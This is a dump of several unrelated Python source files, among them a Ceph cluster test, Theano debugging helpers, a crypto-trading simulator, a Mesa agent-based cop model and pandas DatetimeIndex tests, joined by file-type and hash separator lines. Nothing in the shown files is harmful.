from ocs_ci.ocs.cluster import get_pg_balancer_status
log = logging.getLogger(__name__)
@tier1
@pytest.mark.polarion_id("OCS-2231")
class TestCephDefaultValuesCheck(ManageTest):
def test_ceph_default_values_check(self):
"""
        This test compares the ceph default values taken from OCS 4.3
        against the current values in the cluster
"""
# The default ceph osd full ratio values
expected_full_ratios = {
'full_ratio': 0.85,
'backfillfull_ratio': 0.8,
'nearfull_ratio': 0.75
}
actual_full_ratios = {}
ct_pod = pod.get_ceph_tools_pod()
log.info("Checking the values of ceph osd full ratios in osd map")
osd_dump_dict = ct_pod.exec_ceph_cmd('ceph osd dump')
for ratio_parm, value in expected_full_ratios.items():
ratio_value = osd_dump_dict.get(ratio_parm)
actual_full_ratios[ratio_parm] = float(round(ratio_value, 2))
if not float(round(ratio_value, 2)) == value:
log.error(
f"Actual {ratio_parm} value is {ratio_value:.2f} NOT "
f"matching the expected value {value}"
)
        assert expected_full_ratios == actual_full_ratios, (
            "Actual full ratio values do not match the expected full "
            "ratio values"
        )
        log.info(
            f"Actual full ratio values {actual_full_ratios} MATCH the expected "
            f"full ratio values {expected_full_ratios}"
        )
        # Check if the osd full ratios satisfy the condition
# "nearfull < backfillfull < full"
assert (
osd_dump_dict[
'nearfull_ratio'
] < osd_dump_dict[
'backfillfull_ratio'
] < osd_dump_dict[
'full_ratio'
]
), (
"osd full ratio values does not satisfy condition "
f"{osd_dump_dict['nearfull_ratio']:.2f} < "
f"{osd_dump_dict['backfillfull_ratio']:.2f} < "
f"{osd_dump_dict['full_ratio']:.2f}"
)
log.info(
"osd full ratio values satisfies condition "
f"{osd_dump_dict['nearfull_ratio']:.2f} < "
f"{osd_dump_dict['backfillfull_ratio']:.2f} < "
f"{osd_dump_dict['full_ratio']:.2f}"
)
# Check if PG balancer is active
assert get_pg_balancer_status(), "PG balancer is not active"
|
py
|
1a5f0b8dbea7248e2364b4b4907d1fa9678f9dac
|
import theano
import numpy
import numpy as np
from theano import tensor as T
__author__ = 'Jeff Ye'
def print_ndarray_shape():
"""
this shows how to print ndarray shape as well as the change before and after executing the function.
link: http://deeplearning.net/software/theano/tutorial/debug_faq.html#how-do-i-print-an-intermediate-value-in-a-function-method
"""
def inspect_inputs(i, node, fn):
        print(i, node, "\ninput(s) value(s):", [input[0].shape for input in fn.inputs], end='')
    def inspect_outputs(i, node, fn):
        print("\noutput(s) value(s):", [output[0] for output in fn.outputs])
x = theano.tensor.matrix('x')
f = theano.function([x], [5 * x],
mode=theano.compile.MonitorMode(
pre_func=inspect_inputs,
post_func=inspect_outputs))
f(numpy.arange(10).reshape(2, 5))
def print_detect_nan():
def detect_nan(i, node, fn):
for output in fn.outputs:
if not isinstance(output[0], numpy.random.RandomState) and numpy.isnan(output[0]).any():
                print('*** NaN detected ***')
                theano.printing.debugprint(node)
                print('Inputs : %s' % [input[0] for input in fn.inputs])
                print('Outputs: %s' % [output[0] for output in fn.outputs])
break
x = theano.tensor.dscalar('x')
f = theano.function([x], [theano.tensor.log(x) * x],
mode=theano.compile.MonitorMode(
post_func=detect_nan))
f(0) # log(0) * 0 = -inf * 0 = NaN
def test_value():
from keras.layers.core import Dense
from theano import pp, function
theano.config.compute_test_value = 'warn'
# since the test input value is not aligned with the requirement in Dense,
# it will report error quickly. Change 100 to 1000 will be fine.
t_value = np.zeros((500, 1000), dtype=np.float32)
X = T.matrix()
X.tag.test_value = t_value
d = Dense(200, input_dim=1000)
# d1 = Dense(200, input_dim=1000)
d.build()
z = d(X)
f = function([X], z)
# turn it off after
theano.config.compute_test_value = 'off'
if __name__ == "__main__":
test_value()
|
py
|
1a5f0ddeb904ca7ed206e550970630e0740fffd5
|
from __future__ import annotations
from typing import Dict, Optional, List
from enum import Enum
import json
import os
CONFIG_PATH = "~/.community-operator-dev/config.json"
FULL_CONFIG_PATH = os.path.expanduser(CONFIG_PATH)
class Distro(Enum):
UBUNTU = 0
UBI = 1
@staticmethod
def from_string(distro_name: str) -> Distro:
distro_name = distro_name.lower()
return {
"ubuntu": Distro.UBUNTU,
"ubi": Distro.UBI,
}[distro_name]
def get_config_path() -> str:
return os.getenv("MONGODB_COMMUNITY_CONFIG", FULL_CONFIG_PATH)
class DevConfig:
"""
DevConfig is a wrapper around the developer configuration file
"""
def __init__(self, config: Dict, distro: Distro):
self._config = config
self._distro = distro
self.include_tags: List[str] = []
self.skip_tags: List[str] = []
def ensure_tag_is_run(self, tag: str) -> None:
if tag not in self.include_tags:
self.include_tags.append(tag)
if tag in self.skip_tags:
self.skip_tags.remove(tag)
@property
def namespace(self) -> str:
return self._config["namespace"]
@property
def repo_url(self) -> str:
return self._config["repo_url"]
@property
def s3_bucket(self) -> str:
return self._config["s3_bucket"]
@property
def expire_after(self) -> str:
return self._config.get("expire_after", "never")
@property
def operator_image(self) -> str:
return self._config["operator_image"]
@property
def e2e_image(self) -> str:
return self._config["e2e_image"]
@property
def version_upgrade_hook_image(self) -> str:
return self._config["version_upgrade_hook_image"]
@property
def agent_image(self) -> str:
if self._distro == Distro.UBI:
return self._config["agent_image_ubi"]
return self._config["agent_image_ubuntu"]
def ensure_skip_tag(self, tag: str) -> None:
if tag not in self.skip_tags:
self.skip_tags.append(tag)
def load_config(
config_file_path: Optional[str] = None, distro: Distro = Distro.UBUNTU
) -> DevConfig:
if config_file_path is None:
config_file_path = get_config_path()
try:
with open(config_file_path, "r") as f:
return DevConfig(json.loads(f.read()), distro=distro)
except FileNotFoundError:
print(
f"No DevConfig found. Please ensure that the configuration file exists at '{config_file_path}'"
)
raise
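# Typical usage (sketch; assumes the JSON config file exists at CONFIG_PATH or at the
# path given by the MONGODB_COMMUNITY_CONFIG environment variable):
#   config = load_config(distro=Distro.UBI)
#   print(config.namespace, config.operator_image)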
|
py
|
1a5f0df361027770f1e22ad6d5eb8b8f1ec2d956
|
import sys
import typing
import numpy as np
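# set_val/get_mx below implement a Fenwick (binary indexed) tree over prefix maximums:
# set_val(a, i, x) raises the stored value at index i to at least x, and get_mx(a, i)
# returns the maximum over indices 1..i; both run in O(log n).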
def set_val(
a: np.array,
i: int,
x: int,
) -> typing.NoReturn:
while i < a.size:
a[i] = max(a[i], x)
i += i & -i
def get_mx(
a: np.array,
i: int,
) -> int:
mx = 0
while i > 0:
mx = max(mx, a[i])
i -= i & -i
return mx
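# solve() is a prefix-maximum DP (a weighted longest-increasing-subsequence variant,
# assuming the heights h are distinct values in 1..n as the indexing suggests): each
# flower extends the best beauty sum achievable with a strictly smaller height by a[i].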
def solve(
n: int,
h: np.array,
a: np.array,
) -> typing.NoReturn:
fw = np.zeros(
n + 1,
dtype=np.int64,
)
mx = 0
for i in range(n):
v = get_mx(fw, h[i] - 1)
set_val(fw, h[i], v + a[i])
print(get_mx(fw, n))
def main() -> typing.NoReturn:
n = int(input())
h = np.array(
sys.stdin.readline()
.split(),
dtype=np.int64,
)
a = np.array(
sys.stdin.readline()
.split(),
dtype=np.int64,
)
solve(n, h, a)
OJ = 'ONLINE_JUDGE'
if sys.argv[-1] == OJ:
from numba import i8, njit
from numba.pycc import CC
cc = CC('my_module')
fn = solve
sig = (i8, i8[:], i8[:])
get_mx = njit(get_mx)
set_val = njit(set_val)
cc.export(
fn.__name__,
sig,
)(fn)
cc.compile()
exit(0)
from my_module import solve
main()
|
py
|
1a5f0e09f6a0fc873dc6fcc836a2baa2367c9840
|
#SwapDigitizerNumber.py
#This script swaps the tree references associating coil signal lines with a particular digitizer. When ACQ_216_1 died, we had to move the coils to ACQ_216_3. Now that ACQ_216_1 is resurrected, we need to switch the references back.
#
#Usage:
# python SwapDigitizerNumber.py [s1 [s2]]
#
# Default: Shot -1 (model tree)
# range between shots s1 and s2, including s1 and s2.
#Ted Golfinopoulos, 25 Apr 2012
from MDSplus import *
import sys #For getting command line arguments
import re #Import regular expressions.
#Parse command line arguments.
if(len(sys.argv)>1) :
s1=int(sys.argv[1]) #Grab shot number from command line.
else :
s1=-1 #Default to shot -1
if(len(sys.argv)>2) :
s2=int(sys.argv[2]) #Grab shot number from command line.
elif(s1==-1) :
s2=s1 #If s1 is the model tree, only do s=-1; don't run to s=0
else :
s2=s1 #Only do a single shot
digFrom='ACQ_216_3' #Change digitizer from this
digTo='ACQ_216_1' #Change digitizer to this
#Loop through range of shots
for s in range(s1,s2+1) :
tree=Tree('magnetics',s)
nodeArr=tree.getNode('active_mhd.signals').getNodeWild('BP*') #Grab all shoelace subnodes
#Loop through all nodes
for n in nodeArr :
#print(n)
try :
expr=n.getData()
#print(str(expr))
try :
if (len(re.findall(digFrom, str(expr)))>0) :#If there are matches, replace old digitizer name with new.
newExpr=re.sub(digFrom, digTo, str(expr)) #Need to to-string expression in order for regular expression to work.
#print(str(n) + ' -> ' + str(newExpr))
n.putData(Data.compile(newExpr)) #Put new expression into node.
print( str(n)+" --- Now contains: "+str(n.getData()) )
except : print("String replacement didn't work. Expr was "+str(expr))
except TreeNoDataException :
#Continue
print("No data in "+n.getPath()+"; moving on.")
|
py
|
1a5f0e68068b5585cbc835031b3e0e963076e605
|
"""SimulationOperator를 사용해서 시뮬레이션을 컨트롤하는 Simulator 클래스"""
import signal
import time
from . import (
LogManager,
Analyzer,
SimulationTrader,
SimulationDataProvider,
StrategyBuyAndHold,
StrategySma0,
SimulationOperator,
DateConverter,
)
class Simulator:
"""자동 거래 시뮬레이터 클래스
command_list:
{
guide: 화면에 출력될 명령어와 안내문
cmd: 입력 받은 명령어와 매칭되는 문자열
action: 명령어가 입력되었을때 실행되는 객체
}
config_list:
{
guide: 화면에 출력될 설정값과 안내문
value: 출력될 현재값
action: 입력 받은 설정값을 처리해주는 객체
}
"""
MAIN_STATEMENT = "input command (h:help): "
def __init__(
self,
budget=50000,
interval=2,
strategy=0,
from_dash_to="201220.170000-201220.180000",
currency="BTC",
):
self.logger = LogManager.get_logger("Simulator")
self.__terminating = False
self.start_str = "200430.170000"
self.end_str = "200430.180000"
self.interval = interval
self.operator = None
self.strategy = int(strategy)
self.budget = int(budget)
self.need_init = True
self.currency = currency
self.interval = float(self.interval)
start_end = from_dash_to.split("-")
self.start_str = start_end[0]
self.end_str = start_end[1]
self.command_list = [
{
"guide": "h, help print command info",
"cmd": ["help", "h"],
"action": self.print_help,
},
{
"guide": "r, run start running simulation",
"cmd": ["run", "r"],
"action": self.start,
},
{
"guide": "s, stop stop running simulation",
"cmd": ["stop", "s"],
"action": self._stop,
},
{
"guide": "t, terminate terminate simulator",
"cmd": ["terminate", "t"],
"action": self.terminate,
},
{
"guide": "i, initialize initialize simulation",
"cmd": ["initialize", "i"],
"action": self.initialize_with_command,
},
{
"guide": "1, state query operating state",
"cmd": ["1"],
"action": self._print_state,
},
{
"guide": "2, score query current score",
"cmd": ["2"],
"action": self._print_score,
},
{
"guide": "3, result query trading result",
"cmd": ["3"],
"action": self._print_trading_result,
},
]
self.config_list = [
{
"guide": "년월일.시분초 형식으로 시작 시점 입력. 예. 201220.162300",
"value": self.start_str,
"action": self._set_start_str,
},
{
"guide": "년월일.시분초 형식으로 종료 시점 입력. 예. 201220.162300",
"value": self.end_str,
"action": self._set_end_str,
},
{
"guide": "거래 간격 입력. 예. 1",
"value": self.interval,
"action": self._set_interval,
},
{
"guide": "예산 입력. 예. 50000",
"value": self.budget,
"action": self._set_budget,
},
{
"guide": "전략 번호 입력. 0: Buy and Hold, 1: SMA-0",
"value": self.strategy,
"action": self._set_strategy,
},
{
"guide": "화폐 코드 입력. BTC, ETH",
"value": self.currency,
"action": self._set_currency,
},
]
def initialize(self):
"""시뮬레이션 초기화"""
dt = DateConverter.to_end_min(self.start_str + "-" + self.end_str)
end = dt[0][1]
count = dt[0][2]
if self.strategy == 0:
strategy = StrategyBuyAndHold()
else:
strategy = StrategySma0()
strategy.is_simulation = True
self.operator = SimulationOperator()
self._print_configuration(strategy.NAME)
data_provider = SimulationDataProvider(currency=self.currency)
data_provider.initialize_simulation(end=end, count=count)
trader = SimulationTrader(currency=self.currency)
trader.initialize_simulation(end=end, count=count, budget=self.budget)
analyzer = Analyzer()
analyzer.is_simulation = True
self.operator.initialize(
data_provider,
strategy,
trader,
analyzer,
budget=self.budget,
)
self.operator.tag = self._make_tag(self.start_str, self.end_str, strategy.NAME)
self.operator.set_interval(self.interval)
self.need_init = False
@staticmethod
def _make_tag(start_str, end_str, strategy_name):
return "SIM-" + strategy_name + "-" + start_str + "-" + end_str
def start(self):
"""시뮬레이션 시작, 재시작"""
if self.operator is None or self.need_init:
self._print("초기화가 필요합니다")
return
self.logger.info("Simulation start! ============================")
if self.operator.start() is not True:
self._print("Fail operator start")
return
def stop(self, signum, frame):
"""시뮬레이션 중지"""
self._stop()
self.__terminating = True
self._print(f"Receive Signal {signum} {frame}")
self._print("Stop Singing")
def _stop(self):
if self.operator is not None:
self.operator.stop()
self.need_init = True
self._print("프로그램을 재시작하려면 초기화하세요")
def terminate(self):
"""시뮬레이터 종료"""
self._print("Terminating......")
self._stop()
self.__terminating = True
self._print("Good Bye~")
def run_single(self):
"""인터렉션 없이 초기 설정 값으로 단독 1회 실행"""
self.initialize()
self.start()
while self.operator.state == "running":
time.sleep(0.5)
self.terminate()
def main(self):
"""main 함수"""
signal.signal(signal.SIGINT, self.stop)
signal.signal(signal.SIGTERM, self.stop)
while not self.__terminating:
try:
key = input(self.MAIN_STATEMENT)
self.on_command(key)
except EOFError:
break
def on_command(self, key):
"""커맨드 처리"""
for cmd in self.command_list:
if key.lower() in cmd["cmd"]:
cmd["action"]()
return
self._print("invalid command")
def print_help(self):
"""가이드 문구 출력"""
self._print("command list =================")
for item in self.command_list:
self._print(item["guide"], True)
def initialize_with_command(self):
"""설정 값을 입력받아서 초기화 진행"""
for config in self.config_list:
self._print(config["guide"])
value = input(f"현재값: {config['value']} >> ")
value = config["value"] if value == "" else value
self._print(f"설정값: {value}")
config["action"](value)
self.initialize()
def _set_start_str(self, value):
self.start_str = value
def _set_end_str(self, value):
self.end_str = value
def _set_interval(self, value):
next_value = float(value)
if next_value > 0:
self.interval = next_value
def _set_budget(self, value):
next_value = int(value)
if next_value > 0:
self.budget = next_value
def _set_strategy(self, value):
self.strategy = int(value)
def _set_currency(self, value):
self.currency = value
def _print_state(self):
if self.operator is None:
self._print("초기화가 필요합니다")
return
self._print(self.operator.state)
def _print_configuration(self, strategy_name):
self._print("Simulation Configuration =====")
self._print(f"Simulation Period {self.start_str} ~ {self.end_str}")
self._print(f"Budget: {self.budget}, Interval: {self.interval}")
self._print(f"Strategy: {strategy_name}")
def _print_score(self):
def print_score_and_main_statement(score):
self._print("current score ==========")
self._print(score)
self._print(self.MAIN_STATEMENT)
self.operator.get_score(print_score_and_main_statement)
def _print_trading_result(self):
results = self.operator.get_trading_results()
if results is None or len(results) == 0:
self._print("거래 기록이 없습니다")
return
for result in results:
self._print(f"@{result['date_time']}, {result['type']}")
self._print(f"{result['price']} x {result['amount']}")
def _print(self, contents, logger_skip=False):
if logger_skip is not True:
self.logger.info(contents)
print(contents)
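# Illustrative usage sketch: because of the relative imports above, this module
# is normally driven from the package entry point rather than run directly.
# A typical non-interactive run would look roughly like:
#
#     simulator = Simulator(
#         budget=100000,
#         interval=0.1,
#         strategy=1,  # 1: StrategySma0, 0: StrategyBuyAndHold
#         from_dash_to="201220.170000-201220.180000",
#         currency="BTC",
#     )
#     simulator.run_single()  # initialize, run until finished, then terminate
#
# The keyword arguments match the constructor defined above; the values are examples only.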
|
py
|
1a5f0e8b1f6fe5aa65889531125286d7a2293838
|
# Copyright 2017,2021 Niall McCarroll
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import random
import os
import os.path
from time import sleep
from os.path import exists
import gc
import copy
from tests.test_utils import TestUtils
from treehaus import TreeHaus
class TestWorkload(unittest.TestCase):
def test_workload(self):
self.store = TestUtils.open()
self.index = self.store.getIndex("index1")
self.test = {} # mirror the index contents in a dict
num_versions = 20
num_traverses = 0
checkpoints = []
random.seed(21)
for v in range(0,num_versions):
TestUtils.alter(self.index,self.test,200,1,0.2)
checkpoint_number = self.store.commit()
if checkpoint_number:
checkpoints.append((checkpoint_number,copy.deepcopy(self.test)))
TestUtils.check(self.index,self.test)
TestUtils.traverse_check(self.index,self.test,None,None,False)
TestUtils.traverse_check(self.index,self.test,None,None,True)
for i in range(0,num_traverses):
(lwb,upb) = TestUtils.make_key_pair(5)
TestUtils.traverse_check(self.index,self.test,lwb,upb,True)
TestUtils.traverse_check(self.index,self.test,lwb,None,True)
TestUtils.traverse_check(self.index,self.test,lwb,upb,False)
TestUtils.traverse_check(self.index,self.test,None,upb,True)
TestUtils.traverse_check(self.index,self.test,None,upb,False)
for (checkpoint_number, test_dict) in checkpoints:
with TreeHaus.open(TestUtils.PATH,openAtUpdate=checkpoint_number) as cp:
cp_index = cp.getIndex("index1")
TestUtils.check(cp_index,test_dict)
if __name__ == '__main__':
unittest.main()
|
py
|
1a5f0f2267c30b6c9dea1da214d37bb9bc147818
|
import random
random_numbers = [random.randint(0, 49) for x in range(20)]
print(random_numbers)
squared_numbers = [item ** 2 for item in random_numbers]
print(squared_numbers)
|
py
|
1a5f1036b753eb7396b344bc2463a804ef19df89
|
def gen(camera):
"""Video streaming generator function."""
while True:
frame = camera.get_frame()
yield (b'--frame\r\n'
b'Content-Type: image/jpeg\r\n\r\n' + frame + b'\r\n')
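# Illustrative wiring sketch: this generator is typically returned from a Flask
# route as a multipart MJPEG response. It assumes a Flask app and a Camera class
# exposing get_frame(), both of which live outside this file:
#
#     from flask import Flask, Response
#
#     app = Flask(__name__)
#
#     @app.route('/video_feed')
#     def video_feed():
#         return Response(gen(Camera()),
#                         mimetype='multipart/x-mixed-replace; boundary=frame')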
|
py
|
1a5f10a4c27060e2239c24b3d9feeeffdbe98a6d
|
'''
Copyright 2021 D3M Team
Copyright (c) 2021 DATA Lab at Texas A&M University
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
from d3m import container
from d3m.metadata import hyperparams
import imgaug.augmenters as iaa
import typing
from autovideo.utils import construct_primitive_metadata
from autovideo.base.augmentation_base import AugmentationPrimitiveBase
__all__ = ('ShearYPrimitive',)
Inputs = container.DataFrame
class Hyperparams(hyperparams.Hyperparams):
shear = hyperparams.Hyperparameter[typing.Union[float,tuple,list]](
default=(-20, 20),
description="Shear in degrees (NOT radians), i.e. expected value range is around [-360, 360], with reasonable values being in the range of [-45, 45].",
semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter'],
)
seed = hyperparams.Constant[int](
default=0,
description='Seed for the random number generator.',
semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter'],
)
order = hyperparams.Hyperparameter[typing.Union[int,list]](
default=1,
description="interpolation order to use",
semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter'],
)
cval = hyperparams.Hyperparameter[typing.Union[float,tuple,list]](
default=(0,255),
description=" The constant value to use when filling in newly created pixels.",
semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter'],
)
mode = hyperparams.Hyperparameter[typing.Union[str,list]](
default='constant',
description="Method to use when filling in newly created pixels",
semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter'],
)
class ShearYPrimitive(AugmentationPrimitiveBase[Inputs, Hyperparams]):
"""
A primitive which Apply affine shear on the y-axis to input data.
"""
metadata = construct_primitive_metadata("augmentation", "geometric_ShearY")
def _get_function(self):
"""
set up function and parameter of functions
"""
shear = self.hyperparams["shear"]
seed = self.hyperparams["seed"]
order = self.hyperparams["order"]
cval = self.hyperparams["cval"]
mode = self.hyperparams["mode"]
return iaa.ShearY(shear=shear, seed=seed, order=order, cval=cval, mode=mode)
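# Illustrative sketch: the augmenter built by _get_function is an ordinary imgaug
# augmenter and can be applied to a batch of frames directly, e.g.
#
#     aug = iaa.ShearY(shear=(-20, 20), seed=0, order=1, cval=(0, 255), mode='constant')
#     sheared = aug(images=frames)  # `frames`: list/array of HxWxC uint8 images,
#                                   # a placeholder for frames produced elsewhere in the pipeline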
|
py
|
1a5f11a802f1eb811166e45cfca0cc67ac4cdce4
|
from nonebot.log import logger
from tortoise import Tortoise
async def database_init():
'''
Initialize the database and create tables
'''
logger.debug('Registering database')
database_path = "./data/data.db"
db_url = f'sqlite://{database_path}'
# List the model modules (tables) to load here
models = [
'src.modules.bot_info',
'src.modules.group_info',
'src.modules.plugin_info',
'src.modules.user_info',
'src.modules.token_info',
'src.modules.search_record'
]
modules = {"models": models}
await Tortoise.init(db_url=db_url, modules=modules)
await Tortoise.generate_schemas()
logger.debug('Database registration complete')
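# Illustrative sketch: in a NoneBot2 project this coroutine is usually registered
# as a startup hook so the tables exist before any handler runs. The exact wiring
# depends on the project's bootstrap code; a common pattern is:
#
#     from nonebot import get_driver
#
#     driver = get_driver()
#     driver.on_startup(database_init)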
|
py
|
1a5f120efd2b5de636940dd292c8f3e106695e51
|
import random
from mesa import Agent
class Cop(Agent):
def __init__(self, unique_id, model, pos, vision):
super().__init__(unique_id, model)
self.breed = "cop"
self.pos = pos
self.vision = vision
self.can_arrest = True
self.arrested_step = 0
self.wait_for = 0 # no of steps to wait before arresting someone else
def step(self):
"""
Inspect local vision and arrest a random active agent. Move if
applicable.
"""
# check whether they can arrest again
if not self.can_arrest and self.wait_for == 0:
self.can_arrest = True
else:
self.wait_for -= 1
self.update_neighbors()
active_neighbors, deviant_neighbors, cop_neighbors = [], [], []
for agent in self.neighbors:
if (
agent.breed == "citizen"
and agent.condition == "Active"
and not agent.jail_sentence
):
active_neighbors.append(agent)
if agent.breed == "cop":
cop_neighbors.append(agent)
if (
agent.breed == "citizen"
and agent.condition == "Deviant"
and not agent.jail_sentence
):
deviant_neighbors.append(agent)
if (
self.can_arrest
and self.model.jail_capacity > len(self.model.jailed_agents)
and len(cop_neighbors) > 1
):
arrestee = None
if deviant_neighbors:
possibles = []
for agent in deviant_neighbors:
if agent.steps_active >= 3:
possibles.append(agent)
arrestee = self.random.choice(possibles) if possibles else None
elif active_neighbors:
possibles = []
for agent in active_neighbors:
if agent.steps_active >= 3:
possibles.append(agent)
arrestee = self.random.choice(possibles) if possibles else None
if arrestee:
arrestee.jail_sentence = True
self.model.arrested_agents.append(arrestee)
self.can_arrest = False
self.wait_for = 15
if self.model.movement and self.empty_neighbors and self.can_arrest:
useful_move = self.move_towards_actives()
if useful_move:
self.model.grid.move_agent(self, useful_move)
else:
self.model.grid.move_agent(
self, self.random.choice(self.empty_neighbors)
)
def move_towards_actives(self):
neighborhood = self.model.grid.get_neighborhood(
self.pos, moore=False, radius=self.vision
)
deviants, actives = [], []
for x in neighborhood:
neighbor = self.model.grid.get_cell_list_contents(x)
if neighbor and neighbor[0].breed == "citizen":
if neighbor[0].condition == "Deviant":
deviants.append(x)
if neighbor[0].condition == "Active":
actives.append(x)
if deviants:
toward = random.choice(deviants)
elif actives:
toward = random.choice(actives)
else:
return None
moves = {
"left": (self.pos[0] - 1, self.pos[1]),
"right": (self.pos[0] + 1, self.pos[1]),
"up": (self.pos[0], self.pos[1] - 1),
"down": (self.pos[0], self.pos[1] + 1),
}
new_pos = []
if toward:
if toward[0] > self.pos[0] and self.model.grid.is_cell_empty(
moves["right"]
): # citizen is more right than cop
new_pos.append("right")
elif toward[0] < self.pos[0] and self.model.grid.is_cell_empty(
moves["left"]
): # citizen is more left than cop
new_pos.append("left")
if toward[1] > self.pos[1] and self.model.grid.is_cell_empty(
moves["down"]
): # citizen is further down than cop
new_pos.append("down")
elif toward[1] < self.pos[1] and self.model.grid.is_cell_empty(
moves["up"]
): # citizen is further up than cop
new_pos.append("up")
new_pos = moves[random.choice(new_pos)] if new_pos else None
return new_pos
def update_neighbors(self):
"""
Look around and see who my neighbors are.
"""
self.neighborhood = self.model.grid.get_neighborhood(
self.pos, moore=False, radius=1
)
self.neighbors = self.model.grid.get_cell_list_contents(self.neighborhood)
self.empty_neighbors = [
c for c in self.neighborhood if self.model.grid.is_cell_empty(c)
]
|
py
|
1a5f12103595c7dc272babe2f426ef463ee03e21
|
import warnings
import pytest
import numpy as np
from datetime import date
import dateutil
import pandas as pd
import pandas.util.testing as tm
from pandas.compat import lrange
from pandas import (DatetimeIndex, Index, date_range, DataFrame,
Timestamp, offsets)
from pandas.util.testing import assert_almost_equal
randn = np.random.randn
class TestDatetimeIndex(object):
def test_roundtrip_pickle_with_tz(self):
# GH 8367
# round-trip of timezone
index = date_range('20130101', periods=3, tz='US/Eastern', name='foo')
unpickled = tm.round_trip_pickle(index)
tm.assert_index_equal(index, unpickled)
def test_reindex_preserves_tz_if_target_is_empty_list_or_array(self):
# GH7774
index = date_range('20130101', periods=3, tz='US/Eastern')
assert str(index.reindex([])[0].tz) == 'US/Eastern'
assert str(index.reindex(np.array([]))[0].tz) == 'US/Eastern'
def test_time_loc(self): # GH8667
from datetime import time
from pandas._libs.index import _SIZE_CUTOFF
ns = _SIZE_CUTOFF + np.array([-100, 100], dtype=np.int64)
key = time(15, 11, 30)
start = key.hour * 3600 + key.minute * 60 + key.second
step = 24 * 3600
for n in ns:
idx = pd.date_range('2014-11-26', periods=n, freq='S')
ts = pd.Series(np.random.randn(n), index=idx)
i = np.arange(start, n, step)
tm.assert_numpy_array_equal(ts.index.get_loc(key), i,
check_dtype=False)
tm.assert_series_equal(ts[key], ts.iloc[i])
left, right = ts.copy(), ts.copy()
left[key] *= -10
right.iloc[i] *= -10
tm.assert_series_equal(left, right)
def test_time_overflow_for_32bit_machines(self):
# GH8943. On some machines NumPy defaults to np.int32 (for example,
# 32-bit Linux machines). In the function _generate_regular_range
# found in tseries/index.py, `periods` gets multiplied by `strides`
# (which has value 1e9) and since the max value for np.int32 is ~2e9,
# and since those machines won't promote np.int32 to np.int64, we get
# overflow.
periods = np.int_(1000)
idx1 = pd.date_range(start='2000', periods=periods, freq='S')
assert len(idx1) == periods
idx2 = pd.date_range(end='2000', periods=periods, freq='S')
assert len(idx2) == periods
def test_nat(self):
assert DatetimeIndex([np.nan])[0] is pd.NaT
def test_week_of_month_frequency(self):
# GH 5348: "ValueError: Could not evaluate WOM-1SUN" shouldn't raise
d1 = date(2002, 9, 1)
d2 = date(2013, 10, 27)
d3 = date(2012, 9, 30)
idx1 = DatetimeIndex([d1, d2])
idx2 = DatetimeIndex([d3])
result_append = idx1.append(idx2)
expected = DatetimeIndex([d1, d2, d3])
tm.assert_index_equal(result_append, expected)
result_union = idx1.union(idx2)
expected = DatetimeIndex([d1, d3, d2])
tm.assert_index_equal(result_union, expected)
# GH 5115
result = date_range("2013-1-1", periods=4, freq='WOM-1SAT')
dates = ['2013-01-05', '2013-02-02', '2013-03-02', '2013-04-06']
expected = DatetimeIndex(dates, freq='WOM-1SAT')
tm.assert_index_equal(result, expected)
def test_hash_error(self):
index = date_range('20010101', periods=10)
with tm.assert_raises_regex(TypeError, "unhashable type: %r" %
type(index).__name__):
hash(index)
def test_stringified_slice_with_tz(self):
# GH2658
import datetime
start = datetime.datetime.now()
idx = DatetimeIndex(start=start, freq="1d", periods=10)
df = DataFrame(lrange(10), index=idx)
df["2013-01-14 23:44:34.437768-05:00":] # no exception here
def test_append_join_nondatetimeindex(self):
rng = date_range('1/1/2000', periods=10)
idx = Index(['a', 'b', 'c', 'd'])
result = rng.append(idx)
assert isinstance(result[0], Timestamp)
# it works
rng.join(idx, how='outer')
def test_map(self):
rng = date_range('1/1/2000', periods=10)
f = lambda x: x.strftime('%Y%m%d')
result = rng.map(f)
exp = Index([f(x) for x in rng], dtype='<U8')
tm.assert_index_equal(result, exp)
def test_iteration_preserves_tz(self):
# see gh-8890
index = date_range("2012-01-01", periods=3, freq='H', tz='US/Eastern')
for i, ts in enumerate(index):
result = ts
expected = index[i]
assert result == expected
index = date_range("2012-01-01", periods=3, freq='H',
tz=dateutil.tz.tzoffset(None, -28800))
for i, ts in enumerate(index):
result = ts
expected = index[i]
assert result._repr_base == expected._repr_base
assert result == expected
# 9100
index = pd.DatetimeIndex(['2014-12-01 03:32:39.987000-08:00',
'2014-12-01 04:12:34.987000-08:00'])
for i, ts in enumerate(index):
result = ts
expected = index[i]
assert result._repr_base == expected._repr_base
assert result == expected
@pytest.mark.parametrize('periods', [0, 9999, 10000, 10001])
def test_iteration_over_chunksize(self, periods):
# GH21012
index = date_range('2000-01-01 00:00:00', periods=periods, freq='min')
num = 0
for stamp in index:
assert index[num] == stamp
num += 1
assert num == len(index)
def test_misc_coverage(self):
rng = date_range('1/1/2000', periods=5)
result = rng.groupby(rng.day)
assert isinstance(list(result.values())[0][0], Timestamp)
idx = DatetimeIndex(['2000-01-03', '2000-01-01', '2000-01-02'])
assert not idx.equals(list(idx))
non_datetime = Index(list('abc'))
assert not idx.equals(list(non_datetime))
def test_string_index_series_name_converted(self):
# #1644
df = DataFrame(np.random.randn(10, 4),
index=date_range('1/1/2000', periods=10))
result = df.loc['1/3/2000']
assert result.name == df.index[2]
result = df.T['1/3/2000']
assert result.name == df.index[2]
def test_get_duplicates(self):
idx = DatetimeIndex(['2000-01-01', '2000-01-02', '2000-01-02',
'2000-01-03', '2000-01-03', '2000-01-04'])
with warnings.catch_warnings(record=True):
# Deprecated - see GH20239
result = idx.get_duplicates()
